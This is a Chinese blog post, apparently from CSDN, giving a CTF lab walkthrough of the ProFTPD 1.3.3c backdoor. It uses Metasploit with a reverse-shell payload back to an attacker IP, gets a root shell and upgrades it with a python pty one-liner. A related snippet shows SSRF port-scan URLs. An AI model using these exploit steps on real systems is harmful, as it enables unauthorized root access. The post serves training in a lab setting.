CTF训练 FTP服务后门利用(含靶场下载地址)

最新推荐文章于 2024-05-01 15:13:50 发布
最新推荐文章于 2024-05-01 15:13:50 发布
阅读量937 收藏 7
点赞数 1
分类专栏: CTF入门 文章标签: linux 安全 FTP msf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZY_Jack/article/details/111678822
版权

FTP服务后门利用

扫描端口及漏洞

攻击机ip:192.168.88.129

靶机ip: 192.168.88.130

  • nmap -sV 扫描端口
    在这里插入图片描述
  • searchsploit ProFTPD 1.3.3c

这节主要介绍ftp端口。使用searchsploit来查看该版本的ftp服务有没有可利用的漏洞。

searchsploit ProFTPD 1.3.3c
在这里插入图片描述

  • msfconsole打开metasploit
    在这里插入图片描述

msf扫描和漏洞利用

  • search ProFTPd-1.3.3c

查看对应漏洞

search ProFTPd-1.3.3c

在这里插入图片描述

  • use exploit/unix/ftp/proftpd_133c_backdoor

使用漏洞

use exploit/unix/ftp/proftpd_133c_backdoor

在这里插入图片描述

  • show payloads

查看可以使用的payload

show payloads

在这里插入图片描述

  • set payloads cmd/unix/reverse

设置使用的payload

set payloads cmd/unix/reverse

在这里插入图片描述

  • show options

查看还有哪些需要设置的内容:

show options

在这里插入图片描述
可以看到,RHOSTS和lhost还没有设置,也就是靶机的ip还没有设置。进行设置:

set rhosts 192.168.88.130

set lhost 192.168.88.129

在这里插入图片描述
然后重新通过show options查看,可以发现require为yes的都已经填上了,设置完成。

在这里插入图片描述

  • exploit

exploit执行漏洞,输入id发现是root用户:

在这里插入图片描述

  • python -c "import pty;pty.spawn(’/bin/bash’)"

python -c “import pty;pty.spawn(’/bin/bash’)”

美化界面

在这里插入图片描述
至此获得了控制权

在这里插入图片描述

ZY_Jack
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
ctf+web安全+任意文件上传+任意文件下载
10-08
ctf+web安全+任意文件上传+任意文件下载
CTF6靶机实战.zip
05-25
CTF6靶机实战括三部分: 1)靶机实战过程 2)文件上传的反弹shell文件(shell.php) 3)系统版本漏洞需要的文件(8478.sh)
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox4(CTF
Aluxian_的博客
09-08 1203
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。老样子需要找到flag即可。这个靶机也比较简单 因为标题是CTF1.信息收集 获取ip地址 和端口信息 进行扫描2.文件上传漏洞 通过上传 php-reverse-shell 回弹GetShell3.使用检测可以使用的提权漏洞 (新知识点)4.使用进行提权因为最近刚开学 所以才有时间慢慢更新 这是这个系列第四个靶机啦 🙂。
靶场地址汇总
lm19770429的专栏
07-27 980
在搜索时意外发现,因为输入了vulnhub https://www.vulnhub.com/
推荐大家一些CTF的网站和工具
HackerYY的博客
12-07 6401
CTF工具和网站简介 内有解析
小白怎么入门CTF,看这个就够了(附学习笔记、靶场、工具下载
m0_74131821的博客
05-31 6342
CTF靶场CTF刷题,在校生备战CTF比赛,信安入门、提升自己、丰富简历之必备(一场比赛打出好成绩,可以让你轻松进大厂,如近期的各种CTF杯),在职人员可以工作意外提升信安全技能。
Vulnhub-CTF5靶机实战
御七彩虹猫
05-16 1529
Vulnhub-CTF5靶机实战
CFS内网渗透三层内网漫游靶场-2019某CTF案例
weixin_60329395的博客
07-26 2254
CFS三层内网漫游-2019某CTF案例
CTF训练 ssh私钥泄露(靶场下载地址)
ZY_Jack的博客
12-04 1748
这里写目录标题安装靶机探测ip扫描端口,探测隐藏文件扫ssh远程登陆扫ssh2john转换信息,字典解密 安装靶机 探测ip 扫描端口,探测隐藏文件 扫ssh远程登陆 扫ssh2john转换信息,字典解密
CTF靶机 DC-3
weixin_52221158的博客
09-02 804
CTF靶场 DC-3详细讲解
apachecn#apachecn-ctf-wiki#CTF-AWD靶场搭建和第一题题解_星星明亮的博客-CSDN博客_awd靶
07-25
1.根据当前队伍数量copy所有的队伍的比赛文件夹: 2.启动比赛: 1.每个队伍分配到一个docker主机,给定ctf用户权限,通过制定的端口和密码进行连接
CTF渗透训练环境(镜像,视频,虚拟机)
12-26
带靶机镜像,教学视频(SSH私钥泄露、SSH渗透root主机、SMB服务信息泄露、FTP服务后门利用、Sql-GET参数注入、Sql-POST参数之HTTP报文注入、Sql-X-Forwarded-For参数注入、SSI注入、路径遍历、暴力破解、命令执行、...
计算机网络安全技术:在线CTF靶场.pdf
05-12
在线CTF靶场介绍与体验 CTF (Capture The Flag)中文一般译作夺旗赛,在网络安 全领域中指的是网络安全技术人员之间进行技术竞技的一种比 赛形式。CTF起源于1996年DEFCON全球黑客大会,以代替之 前黑客们通过互相...
tweakpng软件及使用方法,内CTF群,可以下载所有ctf工具
11-29
tweakpng软件及使用方法,内CTF群,可以下载所有ctf工具
linux-journal日志文件特别大怎么办,journal日志文件学习
你是我的天晴
04-28 302
今天发现磁盘容量不多了,就去清理磁盘,发现这个文件特别大:journal,特此来学习下。
Linux』 第一章 基本操作指令(上)
m0_54443558的博客
04-28 1014
Linux 基本指令
获取Java 虚拟机进程ID(java应用进程Id的方法) Linux & windows
weixin_44131922的博客
04-30 427
这个命令会列出所有"java"的进程信息。从中你可以找到你的Java应用对应的进程行,第一列就是进程ID(PID)。这个命令会列出所有"java"的进程信息。在输出的信息中,你可以找到Java进程及其PID。替换为你的Java主类名或jar文件名的部分匹配字符串,pgrep会直接返回对应的进程ID。如果你需要在Java程序内部获取其自身的进程ID,可以使用。这段代码会打印出当前运行Java程序的进程ID。
Linux:浏览器访问网站的基本流程(优先级从先到后)
fox_kang的博客
04-28 768
浏览器访问网站的基本流程(优先级从先到后) 首先查找浏览器是否存在该网站的访问缓存 其次查找本机的域名解析服务器 windows:C:\Windows\System32\drivers\etc\hosts Linux:/etc/hosts 使用外部的域名解析服务器解析(例如:114.114.114.114) 第一步:浏览器使用域名访问www.bilibili.com.网站 第二步:首先去访问根域名解析服务器查询,根服务器返回.com域名解析服务地址==(这里的根域名解析服务器不会直接给出域名对应的
Linux 第十八章
最新发布
一怀明月的博客
05-01 1256
程序地址空间 区间的地址分布 真正理解同一个地址进行读取不同内容 地址空间 虚拟地址和物理地址 虚拟地址: 物理地址: struct mm_struct 页表
ctf 监听端口_SSRF 漏洞分析与利用 CTF 例题)
06-07
SSRF(Server Side Request Forgery)漏洞是一种常见的Web安全漏洞,攻击者可以利用该漏洞伪造服务器端发起的请求,例如访问内部系统或者外部网络等,从而造成安全风险。 SSRF漏洞的利用方式有很多种,其中一种典型的方式是利用SSRF漏洞进行端口扫描。攻击者可以构造特定的请求,使目标服务器向攻击者指定的IP地址和端口发起连接,从而达到端口扫描的目的。 下面我们就来分析一下SSRF漏洞的利用过程。 一、漏洞利用过程 1. 构造恶意请求 攻击者可以构造恶意请求,将需要访问的目标URL替换成攻击者指定的URL,从而实现伪造请求的目的。 例如,以下请求中的网址参数即为存在SSRF漏洞的关键点: ``` http://example.com/?url=http://attackersite.com ``` 攻击者可以将其替换成需要访问的目标URL,例如: ``` http://example.com/?url=http://127.0.0.1:22 ``` 2. 利用漏洞进行端口扫描 当攻击者构造完恶意请求后,目标服务器会向攻击者指定的IP地址和端口发起连接,如果连接成功,说明该端口开放,否则该端口关闭。 攻击者可以通过不断尝试不同的端口,从而达到端口扫描的目的。 二、实战演练 下面我们将通过一个CTF例题来演示如何利用SSRF漏洞进行端口扫描。 1. 环境搭建 我们可以使用Docker来搭建漏洞环境,具体步骤如下: 1)拉取Docker镜像 ``` docker pull bluetonem/hackme-ssrf ``` 2)启动容器 ``` docker run -d -p 8080:80 bluetonem/hackme-ssrf ``` 2. 漏洞利用 访问http://127.0.0.1:8080/,可以看到一个简单的Web应用程序,该应用程序可以通过URL参数获取指定网址的源代码。 我们可以利用SSRF漏洞,将目标网址替换成攻击者指定的URL,从而实现伪造请求的目的。 例如,以下请求中的网址参数即为存在SSRF漏洞的关键点: ``` http://127.0.0.1:8080/?url=http://attackersite.com ``` 攻击者可以将其替换成需要访问的目标URL,例如: ``` http://127.0.0.1:8080/?url=http://127.0.0.1:22 ``` 如果该端口开放,返回的页面会显示"SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2"等信息,说明端口开放。如果该端口关闭,则返回的页面会显示"Connection refused"等信息,说明端口关闭。 通过不断尝试不同的端口,可以实现端口扫描的目的。 三、防御措施 为了避免SSRF漏洞的产生,需要采取以下安全措施: 1. 对用户输入的URL进行严格验证,确保只访问合法的URL。 2. 对URL进行白名单验证,只允许访问指定的URL,避免访问不受信任的URL。 3. 对访问的目标URL进行限制,避免访问内部系统或者外部网络等不安全的URL。 4. 对服务器的网络端口进行限制,避免访问不受信任的IP地址和端口。 5. 对服务器进行定期的安全审计,及时发现和修复漏洞。 以上是关于SSRF漏洞分析与利用的详细介绍,希望对你有所帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值